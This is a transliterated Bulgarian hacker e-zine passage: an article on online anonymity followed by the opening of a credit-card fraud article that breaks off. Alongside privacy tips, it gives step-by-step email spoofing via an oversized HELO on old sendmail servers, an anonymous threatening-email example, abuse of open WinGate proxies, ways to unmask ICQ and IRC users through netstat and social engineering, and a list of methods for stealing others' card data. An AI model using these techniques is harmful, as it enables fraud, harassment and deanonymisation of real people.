vi kaje njakoi expert criminalist kakvo mastilo e bilo, koga e bilo
pechatano s nego, ot koeto se doseshtate, che mojete da razbere sled malko
'prouchvane' koi e bil tochno tozi vestnik. Nadjavam se vseki da e shvanal
kakvo iskam da kaja (ako ima njakoi, koito oshte se chudi - sorry...takyv
primer mi doide na um v momenta ;-) Kazano vsichko gore s 10 dumi - dokato
browsvate mogat da se razberat dosta neshta za vas.
Naprimer :
+ Poseshtavate stranica. - samo sled kato se e zaredila veche webmasteryt (a
i ne samo toi) moje da znae :
1. Vasheto IP .
2. Vashijat hostname.
3. Vashijat kontinent.
4. Vashata dyrjava.
5. Vashijat grad.
6. Vashijat web browser, versija).
7. Vashata operacionna sistema (OS).
8. Vashata razdelitelna sposobnost na monitora.
9. Kolko bitov cvjat imate.
10.Predishnijat URL, na koito ste bili (t.e otkyde ste doshli tuk)
11.Estestveno vashijat Internet Dostavchik (ISP).
12..ima i oshte ;-)
(Bel.Iron - men lichno ne me e strah niakoi da znae tezi raboti... no to si
zavisi;-)
Ako ne vjarvate, otidete naprimer na: http://www.cyberarmy.com/cgi/whoami.pl
Shte kajete - heh, tova e nishto... No byrkate - tova e dostatychno, za da
vi kajat i koi nomer gashti nosite (s malki izkliuchenija). Dostatychen e
edin telephonen razgovor s admin-a na ISP-to i gotovo.
Samo za oshte nevjarvashtite da spomena... predi godina bashta mi doide s
edin kriivo-ljavo napisan e-mail beshe neshto ot roda na (xxxx@hotmEil.com
;-) i kaza, che tova e nashijat, kum koito e v USA ot 3-4 godini. Az se
zainteresuvah dostatychno i sled njakolko chasovo rovene samo ot mail-a
(koito zabelejete e v hotmail.com) uspjah da razbera address-a, telefona,
kyde raboti - shtoto e Dr. ;-), i daje karta na ulicata na kojato jivee sys
zagradeno s cherveno krygche tochno mjastoto kydeto jivee... e da vse pak
shte kajete tova e USA. No ne zabravjaite, che tuk gradovete ni ne sa s
milioni... da ne govorim, che v po-malkite gradove ne sa chak tolkova mnogo
horata, koito znajat kakvo e Inet. Pyk i na 'loshite' im stiga i samo
telefona da vi razberat, nali ? ;-)))
Primer:
Poneje imam slabost kym Seattle ;-) eto vijte naprimer :
http://maps.yahoo.com/py/maps.py?Pyt=Tmap&addr=&csz=Seattle&x=10&y=13
mojete da zoom-vate...vypreki che sa malko neshtastni kartite na
maps.yahoo.com, ima i dosta po-detailni.
http://www.lib.utexas.edu/Libs/PCL/Map_collection/world_cities.html
e hubav resource.
MiCRo$oFT ;-( za neshtastie imat mnogo dobri spytnikovi snimki... ne si
spomnjam URL-a. Tyrsete maps sys av.com beshe neshto ot sorta na
terra.server.microsoft... ili ~
=======> cookies (ili biskvitkite)
Sega se setete za sledite ot mastilo po prystite vi ;-)
Moje bi zabeljazvate - websaitovete stavat vse po-umni i po-umni i
dinamichni... eh... i zatova si ima cena. Tazi cena se naricha cookie
(biskvitka, kurabiika, faflichka;-), no tuk veche te ne sa za zadovoljavane
na kulinarnite potrebnosti na potrebitela, a za ulesnjavane (njakoi pyt za
uslojnjavane;-). Tova oznachava che cookie-tata se setvat ot scripta, koito
ste izvikali.
Set-Cookie: NAME=VALUE; expires=DATE;
path=PATH; domain=DOMAIN_NAME; secure
Njama da vi opisvam kak stava vsichko tochno ;-), samo shte vi kaja, che
tezi malki parcheta informacija, koito browseryt si zapisva v cookies.txt
(pri netscape e vyv directorijata:
c:\Program Files\Netscape\Users\default\cookies.txt
Tezi cookie-ta pazjat kakvato informacija e iskal webmaster-a - data, chas
na posledno poseshtenie na saita, informacija za imeto, mail-a,
accounta...etc, koeto sami razbirate e dosta neprijatno ponjakoga. Njakoi
sjada na vasheto PC i dori i da ste si zatrili message history-to na
browser-a pak razbira kyde ste hodili.
Eto shte vi pokaja naprimer malko ot moite cookie-ta: (estestveno malko
preraboteni;-)
.webjump.com TRUE / FALSE 2061246402 SITESERVER ID=ae534c416fff780ba79f3a270503cdc
news-bg.com FALSE FALSE 1858918878 News-bg vote235
.netscape.com TRUE / FALSE 1393939478 HITO_VISITS AF3E11199+10AFA6*E0D4E*1
Naprimer news-bg.com pokazva, che sym glasuval veche - i tova oznachava, che
ako probvam pak da glasuvam, cgi scripta shte proveri i shte razbere, che
njamam pravo pak. ;-) Estestveno, mojete da izkliuchite da priemate
cookie-ta, no tova ponjakoga ne pomaga - scripta prosto shte vi kaje 'Iskam
cookie-ta' i njama da raboti.
[B.Red: po podoben nachin e zastitena i stranicata na mobikom za puskane na
suobstanie do pager. ideqta e da ne movete prosto ej taka da si link-nete ot
washa stranica tehniqt script - celta e wsichki da hodqt pri tqh i ot tam da
puskat msg. zastitata obache e mnogo elementarna - kum edin .gif na butonche
wi se prasta cookie, koeto sled towa se wrusta, i ako ne se predade
syotwetnoto cookie - prosto izduhwate. Sigurno sami se sestate, kolko e
banalno preodolqwaneto na podoben rod Cookie zastiti i za pone ochakwam
wseki moment nqkoj besen anarchist da si naprawi script-che, s koeto da
flood-ne pagerite w BG :).]
Mislja, che vi stana jasno kakvo predstavljavat cookie-tata i che horata,
koito sa s diabet, ne trjabva da gi jadat ;-))))
(btw. Poveche za cookietata mojete da prochete naprimer na:
http://www.netscape.com/newsref/std/cookie_spec.html)
=======> .chk failovete (malko lirichno otklonenie)
Ako ste zabeljazali, njakoi pyt, kogato pravite quick reboot ili
restartirate vnezapno (nai-chesto ne po vasha vina;-)), se pojavjavat falove
.chk vyv C:\
naprimer :
FILE0001.chk
FILE0002.chk
FILE0003.chk
i t.n
Shte bydete ocharovani (otchajani !!!;) kolko informacija mojete da namerite
v tjah..!! Iztrivaite gi vednaga sled kato gi zabelejite.
=======> Anonymizer (Mojete da izpolzvate anonymizer-i)
Te deistvat po slednijat nachin:
1. Otivate na stranicata na anonymizer-a
2. Preborvate se s reklamite i banerite.. i stigate do poleto, koeto vi
podkanva da napishete URL-a na saita, koito iskate da browsvate
anonymno.
3. Pishete saita, natiskate ENTER ili clikvate (samo edno clik! ;-)))
4. Mislite si che browsvate anonymno !?!!?
Legenda: 4.-ta tochka - Mislite si zashtoto dori i saita da ne razbere
vasheto deistvitelno IP, to sled edna goljama zainteresovanost (stiga da ima
smisyl) moje da poiska malko informaciika ot anonymizer-a. Koito ako ima
polza s udovolstvie bi razkril kakvoto moje. Zatova za 'po-sigurno'
izpolzvaite njakolko anonymizer-a...ne, ne edin sled drug ami kato gi
'navyrjete' naprimer :
http://www.AzSymAnonymizer.com/cgi-bin/TovaEMojatScript.cgi?http://www.AzSymDrugAnonymizer.com
/cgi-bin/ATovaPykEMojatScript.cgi?http://www.ATovaEURLotKydetoUseraIskaDaOtideAnonimno.com
(Bel.Iron - na edin ot saitovete, koito poddurzhah, imahme problemi sus
spam, idvasht ot www.anonymizer.com... Triabvashe prosto da se obadim na
personala tam i da kazhem, che ni spamvat, da ni slozhat v spisukut sus
zabranenite saitove... Za nula vreme stana)
Vsichko tova gore se pishe na edin red zaedno :-))). Taka mojete da navyrjat
dosta anonymizeri i shansa njakoi da vi prosledi po logovete e dosta
po-malyk.
Eto vi i nai-izvestnijat anonymizer - www.anonymizer.com
(btw. mojete da izpolzvate i Altavista za anonymizer - kato dadete URL-a v
translation-a ;-)
=======> Anonimni proxy-ta
Te deistvat tochno po syshtijat nachin, kakto vashite proxy-ta, koito vi
dava vasheto ISP da polzvate zaedno s accounta. Po princip vsichko e
standartno pri tjah... conectvate se na port 8080 i davate zajavkata si ;-)
s tazi razlika, che na vasheto ISP proxy-tata sa konfigurirani taka, che
nikoi osven horata s IP na provider-a da ne mogat da go polzvat. (vse pak
horata si plashtat ;-). No molja vi, samo ne byrkaite edno neshto. Anonymno
proxy ne e tova, koeto dava da mu se konektnesh i da go izpolzvash vypreki
che ne si ot negovija Internet Provider. Anonymnoto proxy za da byde takova
trjabva hem da mojete da se konektvate otkydeto i da e svobodno, i osven
tova da ne izprashta v header-a i vashto IP. Zashtoto povecheto proxy-ta go
pravjat. Prashtat svoeto IP zaedno sys IP-to na user-a, koito e podal
zajvkata (ot syobrajenija za sigurnost estestveno ;-(
No ako se porazrovite, mojete da namerite dobri anonimni proxy-ta.
Estesveno, shte vi preporycham Cyber Army - rajat za pone malko anonymnost
;-)
http://www.cyberarmy.com/lists/proxy/
Tuk ne samo mojete da vidite goljam spisyk s anonymni proxy-ta, a i da
testvate vasheto proxy za da ne se izlojite kato .....;-)
========> Anonymous Remailers
Celta im e, kakto se doseshtate, da izpratite pismoto si anonymous
(razbrahme se, za (full-anonymous nali ? ;-) Eto edin: http://anon.isp.ee/
--> (btw.toja e designed spec. za ManiaX ;-)))))
- Na saita se kylnat che ne pazjat logove - koi znae.?!
Povecheto ot tjah sa bezplatni - estestveno - inache koi shteshe da gi
ipolzva :-) Shte opisha kak se deistva s nego. Signup-vate si se za free
account-a, sled kato go napravite, prashtate e-mail do robot@anon.isp.ee
(bez SUBJECT!!!) i kato text pishete slednoto :
< ------- cut here -------- >
user: vasheto username
pass: vashata parola
realaddr: e-mail-a na poluchatelja.
realsubj: subject-a na maila.
< ------- cut here -------- >
za koito skljapate - oshte eto primer :-) : Iskate pismoto vi da izglejda
taka:
///////////////////////////////////////////////////////////////////////////////////////
Subject: Eiiiiiiiiii ;-))))))
i text:
Mara we.
Ohliuffff, ako oshte vednyj dyshterja ti izleze v nashta mahala shte te
napravja djado !. Ne se sheguvam :-)!
///////////////////////////////////////////////////////////////////////////////////////
do poshtata poshtata mu klepar@negovotoisp.com
prashtate slednija mail do robot@anon.isp.ee (NE SLAGAITE SUBJECT!!!)
< ------- cut here -------- >
user: user (vmesto user si pishete vashto username)
pass: pass (i parolata vmesto pass)
realaddr: klepar@negovotoisp.com
realsubj: Eiiiiiiiiii ;-))))))
Mara we.
Ohliuv, ako oshte vednyj dyshterja ti izleze v nashta mahala shte te
napravja djado !. Ne se sheguvam :-)!
< ------- cut here -------- >
ei i bez redovete <--- cut here ---> ;-)
Sled kato byde izprateno, shte vi vyrne potvyrjdenie ot anon.isp.ee, che e
bilo izprateno uspeshno. I nai-hubavoto e, che kato bashtata vi otgovori,
vie shte poluchite pismoto mu, a toi vse oshte shte se chudi koi ste vie?
;-))) (No molja vi, ne se dryjte kato maimuni, osven ako naistina ne vi
prinudjat). E, da, ima i web based remaileri, ama loshoto pri tjah e, che ne
mojete da si poluchite reply-to :-)
========> SMTP relaying
Tova e nachin, koito mislja, che e izvesten na vsichki, no za vseki sluchai
shte go opisha.
Namirate si edin SMTP server - eto pak shte vi podskaja:
http://www.cyberarmy.com/lists/smtp/
ili si scanvate, no vajnoto e da e sys stara sendmail versija. Mislja, che
pod 8.6 beshe i se telnetvate kym SMTP porta mu - 25-ti. Bi trjabvalo da vi
pozdravi i da vi kaje sendmail versijata si. Sled tova pishete:
hello zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.....
(proizvolni simvoli -----^ za vseki sluchai > 4096 broja ;)
Taka se poluchava buffer overflow i se precakva poleto, v koeto shte se
zapishe po-kysno IP-to vi.
Sled tova pishete:
mail from: cya@aligator.com ( mojete da si izberete kakyvto
si iskate adres - tova shte izlezne
kato izprashtach pri nego)
Posle:
rcpt to: mojat@vrag.com (tova e poshtata na jertvata)
Posle pishete samo:
data
I sled kato natisnete Enter pochvate sys objasnenijata (tova e kato text):
Zdrasti prijatel kak ja karash ?........i taka
natatyk si pishesh...
Kato svyrshite natiskash Enter pishete edna tochka i pak natiskate enter.
Gotovo. Samo edin syvet - vinagi probvaite tova pyrvo kato si izpratite do
vas proba. Proverete dali vi izliza 'zzzzzzzzzzzzzzzzzzzzzz...' ili IP-to
vi. Vtoroto ne e jelatelno :) Stiga tolkova za SMTP relaying ;)
========> Wingate (WinGateZ ;-)
Wingate-a e programa, kojato se izpolzva za proxy pri Winboze 9x/NT
serverite, znachi kato chuete za Wingate seshtaite se za bug ;-))))))))
Sega shte objasnja za tezi, koito vse oshte ne znajat, kakvo znachi Wingate
i kak se jade ;-))) Zashtoto znam, che drugite v momenta se smejat na glas -
na tjah im mirishe na PhUN ;-)
Golemijat problem na Wingate-a e, che vseki - absolutno vseki - moje da se
connectne kym nego na port 1080. Doseshtate se natatyk.... vseki moje da se
connectne kym tova 'proxy-nce' i da napishe: target-ip-address-or-hostname
port. Togava Wingate-a shte shte relayne zajavkata i shte izglejda vse edno
che mashinata, na kojato e wingate-a, podava zjavkata. Estestveno, sysadminyt
moje da smeni port-a, no tova ne e goljam problem, nali? ;). Preporyka za
vsichki, koito v momenta sa sys Wingate ;-) - hora slojete si pone SyGate.
Razlikata e che pone ne vseki shte se connect'va ;-)
Krasivoto e, che wingate moje da se izpolzva prakticheski za vsichko -
vsichko na koeto mojete da mu dadete SOCKS Firewall. Mdammm moje da go
izpolzvate naprimer, kogato vi bannat ot njakoi IRC kanal - zashtoto vasheto
IP veche njama da otgovarja na bana. No ne prekaljavaite :-))))
A, i da vi predupreda - vijdal sym botove, koito se random connectvat kym
vashetoIP:1080 t.e taka vi proverjavat dali ne minavate prez na Gate Win-a
(WinGate). I ako se okaje, che imat kysmet, vi kickvat !!!
Eto vi edno 'leko' listche s WinGate-ove :
http://www.cyberarmy.com/lists/wingate/
[B.Red: tuk ste si pozwolq da naprawq komentar: W dejstwitelnost wingate ima
dosta opcii, koito wi pozwolqwat da filtrirate gadowete, koito se opitwat da
wi se namushat na razni portowe. Az primerno imam otworen N-ti port na
mashinata, kojto obache e dostupen samo za Solar-a. Tam e rabotata, obache,
che po-stari wingate versii po default puskat wseki. Wingate za Win2K
naprimer po default priema connection-i samo ot Ethernet interfejsa]
========> IRC (ili po-pravilno kazano cIRC ;-)
Nai-lesnoto i nai-trudnoto mjasto za anonmnost ;-). Znaete, che sled kato
ste vleznali v IRC, vseki, koito vi znae nicka, moje da razbere slednite
neshta:
1. Vasheto istinsko ime (samo chrez realname/server pozvlojavash finger)
2. Vashijat E-mail (estestveno ako napishete istinskija).
3. Vasheto IP (Osven ako ne izpolzvate njakoja ot goreposochenite techniki)
4. Vashijat hostname.
5. Vasheto ISP.
6. Vashijat continent.
7. Vashata dyrjava.
8. Vashijat grad.
i pri vashe nevnimanie oshte poveche
Ako ne iskate da se poluchi taka, prosto izpolzvaite Wingate, SOCKS,
accounta na syseda vi ili izobshto kakvoto vi doide na um. I zapomnete - IRC
e zlatnata sreda za soc. engineering, taka che vnimavaite (da ne hodite do
ofisa na techno-link i da vi izgonjat ot tam ;-))) Mojata preporyka e da
izpolzvate njakoi byrzi socks da vnimavate s kogo govorite !!! ;)
========> ICQ
Izkliuchvame tova, che mojete da si dadete real info vyv poletata pri
registracija (naistina ponjakoga horata si misljat, che sa dlyjni ;-).
Znachi pri ICQ-to mogat da otkrijat za vas syshtite neshta kakto i pri
IRC-to. No nai-chesto kato se chue ICQ vseki se seshta za IP, crack za IP i
MultiICQ.
IP-to ili kak da go skriem ili kak da go otkriem - Predstavete si kakvo bi
stanalo, ako Mirabilis naistina pozvoljavashe vsichki syobshtenija da
minavat prez tehnijat server... prosto njamashe da izdyrjat. Zatova
sybshtenijata se izprashtat DCC ;-) Directno mejdi dvata hosta... i samo ako
ponjakoga ima njakakvi problemi s izprashtaneto, se izpolzva opcijata za
'thru server', kojato ponjakoga naistina e mnogo polezna.
Kak da skriem sobstvenoto si IP i taka da izbegnem opitite za attacki? V
'security' ima opcija 'IP Publishing' - tja trjabva da e izbrana. Ima i 'Web
Aware ' - tova ne trjabva da e cheknato zashtoto vseki koito iska moje da
razbere dali naistina ste vyv ICQ-to v momenta.
Edva li ima njakoi, koito da ne znae, che IP-to se skriva pri vashija
klient, kogato otsreshtnoto ICQ e konfigurirano da ne pokazva IP-to si...
sledovatelno ako mojete da nakarate vashija klient da ne obryshta vnimanie
na preduprejdenieto, che otsreshtnijat klient ne iska da se znae IP-to mu,
to IP-to mu shte se vijda. Tova se potvyrjdava ot faktyt, che po princip
ICQ-to deistva na principa na DCC t.e. vryzkata se osyshtestvjava directno
m/u dvata ICQ klienta. Po tazi prichina e nevyzmojno vashijat klient da ne
znae IP-to na horata, s koito govorite v momenta... prosto ne iska da go
kaje :-))). Problemut se reshawa s crack-ove (koito sa naistina strashno
razprostraneni navsjkyde), no ako mojete si napravete vie crack-cheto shte e
dosta po-dobre, zashtoto koi znae koi go e pisal, s koi krak i kakvi
podpravki e slojil ;-)). Ako tova ne e po silite vi ima edin drug mnogo
prost nachin da razberete IP-to na 'choveka' s koito si govorite.
Nujni sa samo dve neshta :
- V momenta da si govorite activno s nego (imam predvid syobshtenija, chat,
file transfer..)
- Netstat
Pyrvoto ne mislja che e problem, vtoroto, ako njakoi sluchaino ne go znae,
vi pokazva vsichki activni vryzki kym vashijat computer. Netstat ima vyv
vsjeki Win 95/98/NT/2000 (da ne govorim za Linux/Unix;-), a ako ne mojete da
se opravite (?!??!;) mojete da si drypnete otnjakyde njakakyv drug netstat -
Xstat...etc. Povecheto sa GUI za po-lesna upotreba.
Nachin na deistvie: Puskate Netsat i vijdate koi kym koi port se e
connectnal i estestveno vijdate IP-to mu. Tova e. [B.Red: drug e wuprosa,
che trqbwa da ucelite momenta, w kojto prastate msg, tuj kato ICQ ochakwa
potwurvdenie ot drugata strana i sled towa si close-va connectiona. Move i
malko da se ozorite koe tochno IP da gledate, stoto ICQ-to se bind-wa na po
nqkolko port-a nawednuv, a kogato e pusnato prez SOCKS - sywsen nisto nqma
da widite]
(Bel.Iron - Ne e tochno taka... Kogato se osushtestvi connection za
prashtane na suobshtenie, toi sedi otvoren dosta vreme (pone niakolko
minuti), v sluchai, che reshish da pratish suobshtenie pak. Edin vid
optimizacia :-) Taka che netstat shte ti pokazhe vsichki, na koito si
prashtal (ili koito sa ti prashtali) message v poslednite niakolko minuti)
Kakto sami se ubejdavate, kydeto i da hodite, kydeto i da vlizate, ostava IP-to
vi. Vse pak donjakyde IP-to vi ne govori mnogo za vas, osven ako accountyt ne
si e vash. No da vi predupredja! BTK! Vnimavaite, zashtoto ako stanete
mnogo nahalen/na , pri malko po-goljama zainteresovanost (pari naprimer) ot
BTK mogat da vi svijat dosta gaden nomer. Shte vi kaja edin primer. Lichno
az sled kato bjah sybral polovinata accounti na edno ISP, shefa na ISP-to
malko se 'zainteresova' zaedno sys BeTeKa i edin den mi cyfna sys edno
listche razpechatano lichno ot BeTeKa i mi pokaza telefonnite mi razgovori
za predishnite 3 dena. (pojasnenie: telefonyt mi e analogov i na providera
modemite ne bjaha s CallID!!!)
Ako zapochnete da vdigate kryvnoto na njakoi provider konkretno, i ako toi
ima 'dobroto jelanie', moje da zapochne da sledi vnimatelno navicite na
svoite potrebiteli. Spored men tova e edna cjala tema. Ako ne ste
zabeljazali - vseki si ima svoite navici - vednaga naprimer sled kato vlezne
v Inet vliza v ICQ, sled tova otiva vyv Hotmail da si proveri poshtata. Prez
tova vreme otvarja mboard-a na Phreedom i t.n. Tova moje da vi izdade.
Moje i da ne izdava tochno koi ste. No sled malko poveche interes moje i
tova da se razbere. Taka che mnogo trjabva da se vnimava 's kogo' i 'kak'
;-)
[B.Red: W Phm#19 imashe dosta interesen article po temata - Paranoia]
Silno oryjie sreshtu vashata anonimnost e soc. eng. Vse pak sys 100 grama
mozyk i malko fantazija njakoi moje da izmykne takiva neshta za vas, che
posle da syjaljavate. Zatova trjabva da se vnimava v IRC, ICQ.... Kakyv drug
syvet - mdam setih se za edin chovek ot Lovetch. Sled kato prochetoh
njakoi neshta, koito toi e pisal - zapomnih nesyznatelno elementi po koito
biha mogli da go identificirat.
Trjabva mnogo da vnimavate kakvo opisvate za sebe si!!! Zashtoto toi
izdadavashe neshta, koito ne trjabva da se izdavat, ako jiveete v malko
gradche. Shte vi opisha njakoi neshta, koito si spomnjam:
- Slusha Prodigy
- Ima ochila
- Jivee v kyshta na dva etaja
- Jivee v Lovech
- Poznava hora ot mestnoto BeTeKa
- Zanimava se s computri
- Pravil si e gavri s telefonite na polovin Lovetch
- Ot BTK sa sprjali tochno do tjahnata kyshta za da proverjavat po povod
tezi gavri
......
Zamislete se kolko li choveka v tozi 'goljam grad' - Lovetch otgovarjat na
tova opisanie? Ako jiveete v Sofia ili drug goljam grad - njama problemi s
tova info. NO zamislete se vsjako edno ot tezi neshta ne govorjat nishto
sami po sebe si, no vzeti nakup? Kakto i da e - vzeh tozi primer. zashtoto
mi se struva, che chovekyt beshe gotov da propilee malko ot anonimnostta si,
za da specheli slava. Koeto e ujasno!!!
Njama da vi paste-vam logovete ot razgovori ot IRC, no samo sled edna smjana
na nick-a, edno a/s/l - 18/f/Plovdiv moga da razbera dosta polezna
informacija.
I imaite predvid oshte edno neshto - ako njakoi vi hvyrli mernika da nauchi
info za vas i se poznavate samo v ICQ-to primerno - nishto ne mu prechi da
napravi malko spravka v IRC pod drug nick...da razbere pone v koi kvartal
jiveete. Na drugijat den toi shte se predstavja za syvsem drug chovek i sled
kato veche znae kvartalyt moje da napravi neshto mnogo hitro.
Primer:
<pi4ka> -Zdrasti
<anonimen> - zdr.
<pi4ka> - kak e ? ;-)
<anonimen> - biva...;-)
....blah blah...
<pi4ka> - Az jiveja vyv JK 'Margaritka' (primerno ;-)))
<pi4ka> - A ti otkyde si ? ;-)
<anonimen> - heh ..i az sym ot tam ;-)))
(ako ne ste ucelili prosto baba vi jivee tam i vie chesto hodite pri neq ;)
<pi4ka> - basi...kakvo syvpadenie..kak se kazvash
(izmisljate edno chesto sreshtano ime naprimer Marija ;)
<anonimen> - Mi seshtam se za edna .....
(i ot tuk natatyk davate po sobstvena fantazija)
Ako deistvate hladnokryvno, s premereni emocii mojete da razberete i dolnite
gashti na choveka. Moje daje sreshta da si uredite (samo da ne vi vyrjat
tenekija).
No i za tova ima nachin. Dokarvate njakoja phriendka u vas...objasnjavate i
situacijata. Izmykvate mu telefona, kato mu kajete che shte mu se obadite
vednaga. 'Iskate da go chuete najivo ;-)'. Puskate vashta phriendka... tja
ugovarja sreshtata i gotovo.
Tova zapochna da prilicha na soc.eng. tutorial, no tova e za da vi pokaja
kakvo moje da stane, za da razberete, che ima hiljadi nachini da razberat
samolichnostta vi. Zatova vinagi obmisljaite, che tozi chovek koito sedi
sreshtu vas, moje da ne e:
- Tova, za koeto se predstavja
- Tolkova dobyr, za kolkoto go mislite
Mdam, shte spomena i drugo neshto, koeto e mnogo vajno - prijatelite vi!!!
Stava vypros za horata v ICQ Contact list-a naprimer, horata ot kanala...
izobshto za njakoi, koito ne dyrji na takava anonimnost (ili prosto ne znae
kak da ja zapazi). Ponjakoga nai-lesnijat nachin e da se sprijatelite s
tjah, i posle chrez tjah da dostignete do choveka, koito vi trjabva. Tova e
dosta po-lesen metod. Zatova predupredete po-dobrite si prijateli, po-techno
tezi, koito znajat neshto poveche za vas.
Na men lichno mi sa se sluchval takyv opit ot tip 'Trojanski kon', no poneje
choveka go bjah predupredil, si mi kaza kakvo beshe zamisleno.
I neshto, s koeto smjatam da zavyrsha:
...Anonmnostta e nai-vajnoto neshto v Internet. Vse pak vseki chovek ima
pravo na lichen jivot (lichen virtualen svjat ;-p), koito da ne byde sleden,
podslushvan, sniff-van ot nikoi drug.... Tova spored men e nai-goljamoto
predimstvo, nai-silnoto oryjie na I'net. Horata vinagi sa si mechtali
nesyznatelno za takyv vid obshtuvane - malko nerealno, malko nestandartno
;-). Shte vi izdam i oshte edno nesho. Kogato za pyrvi pyt vidjah modem, imam
w predvid izpolzvane na modem (ne da go gledam prez vitrinata na magazina),
se connectnahme s TERMINATE 5.00 s edin prijatel. I si pusnahme chat-a. E,
togava ako ne lafihme 6-7 chasa... Nito toi si padashe po lafa, nito
az... Nito se bjahme vijdali ot godini... Prosto tova te zavladjava...
I'Net e dosta interesen nachin na obshtuvane. Nachin, pri koito '+'-ovete sa
mnogo poveche ot '-'-ite. Njama da vi razpravjam pyk kakvo stana kato
poluchih pyrvite si 10 chasa Inet. (zakonno !!! ;-)
Ne sa malko organizaciite, koito se borjat za anonimnost v Inet. Taka i
trjabva. Moje bi vsichki ot vas sa chuvali za novite (veche ne tolkova novi)
priumici na MiCRo$oFT i Intel (Intel Inside, Idiot outside - ne sym syglasen
s tova - CPU-to mi e K6 ;-).
Stava vypros za Identifikacionnite nomera na Intel processorite ot serijata
Pentium III. Tova sa unicalni nomera, koito sa 'harduerno' zapisani v CPU-to
na vsichki Pentium III-ki. Spored Intel tova shteshe da pomogne dosta
sreshtu 'credit card fraud' (ih, ...deeba ;-), sreshtu 'security
problemi', etc.
No tezi identifikacionni nomera sa si chisto 'nomerirane na zatvornicite' -
vsjakakyv shans za anonymnost otiva po djavolite. Ot Intel kazaha, che tozi
nomer moje da se vkliuchva i izkliuchva samo ot sedjashtijat na PC-to - i to
samo na nisko nivo, no vednaga sled tezi dumi se pryknaha 'programki', koito
dosta dobre manipuliraha tochno tozi UIN. Syshtoto e polojenieto i pri
MiCRo$oFT (daje oshte po-tragichno) - pri update ili registracija na Win
prosto samo MiCRo$oFT si znae kakva info si drypva za PC-to. Zashto togava
shte si krijat sourca na toja bugav Windows?. Predstavete si kolko info
moje da izdyrpa za vas ? :
- Info za vsichkite v instalirani programi.
- Info dali sa registrirani legalno.
- Pass-ove za vsichko, koeto ste save-nali.
- .....hiljdai neshta oshte...
A i naskoro imashe edin gaf pokrai edin kliuch, koito uj samo MiCRo$oFT
pritejavala. Okaza se, che ne samo tja, ami go 'davala' naljavo nadjasno...
no vsichki znaem shto za kopeleta sa ot MS.
(Bel. Iron - Ideiata beshe, che ediniat kliuch se pritezhava ot Microsoft, a
drugiat - ot NSA. Samo che v Windows 2000 stranno kak se e poiavil i treti
kliuch, a nikoi ne kazva koi go ima)...
Nai-vajnoto e, che syshtestvuvat mnogo Inet organizacii, koito sa za
podkrepjane na anonimnostta v Internet. Te se borjat po edin ili drug nachin
s vsichki opiti za narushavane na tazi anonymnost, nezavisimo ot kakyv
gigant se izvyrshva tova. I vseki chovek, koito se bori za freedom po edin
ili drug nachin, e chast ot tezi organizacii (makar i kosveno). Ne sa mnogo
neshtata zaradi koito chovek iska da jivee.
WE SHALL ARISE FOR PHREEDOM !
Shte vi dam malko linkove za svobodnoto vreme ;-) :
http://www.theargon.com
(dosta dobyr sait za anonymnost,PGP,Firewalli, Wingates...i drugi)
http://www.pgpi.org
(za da ponauchite neshto za PGP encryption )
http://www.cyberarmy.com/lists
(mnogo Wingate-ove, Proxy-ta and i oshte nai-dobrite online toolz )
CAT by: MiCRoPhoBIC Pisan sled redovno
MiCRoPhoBIC.bg@usa.net nedospivane.. ;-))
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#15ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
CC Phishing Star Gruhtar
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
V suvremennia kompiuturiziran sviat elektronnata turgovia izvurshvana chrez
INTERNET e stanala mnogo populiarna. Osnoven metod za plashtania pri on-line
turgoviata sa kreditnite karti. Kreditnite karti predstavliavat bankovi
smetki prinadlezhashti na hora ili firmi, koito sa dostupni chrez elektronni
sistemi za razplashtania. Pri izvurshvane na plashtania po INTERNET
obiknoveno firmata-prodavach iziskva ne samata karta, s koiato klientut shte
zaplati stokata ili uslugata, a samo informaciata, koiato e zapisana vurhu
neia - ime na pritezhatelia, tip na kartata, nomer na kartata, data na
iztichane i v niakoi sluchai poshtenskia kod ot adresa na pritezhatelia i.
Poradi tehnicheska nevuzmozhnost, obiknoveno, kogato stava duma za malki
sumi, nikoi ne prover iava dali pokupkata po INTERNET e izvurshena ot
pritezhatelia na kartata, s koiato toi plashta ili ot niakoi drug (seriozen
propusk). Taka e vuzmozhno ako imame dannite za niakoia chuzhda kreditna
karta, da izvurshvame plashtania po INTERNET za chuzhda s metka. Tova,
razbira se, v niakoi durzhavi e nezakonno, no v niakoi vse oshte ne e.
Vazhnoto e che pri taka organiziranata sistema na plashtania v INTERNET
izmamite s kreditni karti sa chesto iavlenie.
Sled kato mozhem da imame polza ot pritezhavaneto na informacia za chuzhdi
kreditni karti, shte e interesno da razgledame nachinite, po koito mozhem da
se sdobiem s takava informacia. Za kratkost po-natatuk izrazut "informacia
za kreditna karta" shte zam enim prosto s "karta". Uslovno mozhem da
razdelim nachinite za sdobivane s karti na dve grupi - po elektronen put i
po neelektronen put. Po neelektronen put mozhem da se sdobiem s chuzhdi
karti kato subirame kasovi belezhki ili fakturi ot niakoi magazini, kato
prepishem informaciata ot niakoia karta, koiato popada po niakakuv nachin v
nas (naprimer ako rabotim na podhodiashto miasto) ili mozhem da vzemem
takava informacia ot niakoi priatel. Po-interesni i po-bezopasni nachini za
pridobivane na karti sa elektronnite. Te se deliat glavno na slednite
metodi:
Hacking - pronikvane v survuri na banki, elektronni magazini ili drugi
organizacii, koito poddurzhat plashtania s karti;
Fake-shops - Suzdavane na falshif magazin, kudeto izmamenite klienti si
populvat informaciata za kartite, kato si misliat che kupuvat neshto i tia
otiva pri nas;
Sniffing - hakvane na survuri i podslushvane na informaciata, koiato minava
prez tiah chrez specialni podslushvashti programi - sniffer-i;
Social-Engeneering - zabluda na potrebiteli da izpratiat dobrovolno kartite
si, obiknoveno bez da razberat, che sa bili izmameni;
Trojan-Horsing - pronikvane v kompiutrite na obiknoveni potrebiteli ili
firmi chrez troianki kone, sled koeto ot tiah se izvlicha informaciata za
kartite im, v momenta, v koito te samite gi izpolzvat; osledniat metod se
okazva edin ot nai-lesnite, osobeno za horata s dobri programistski
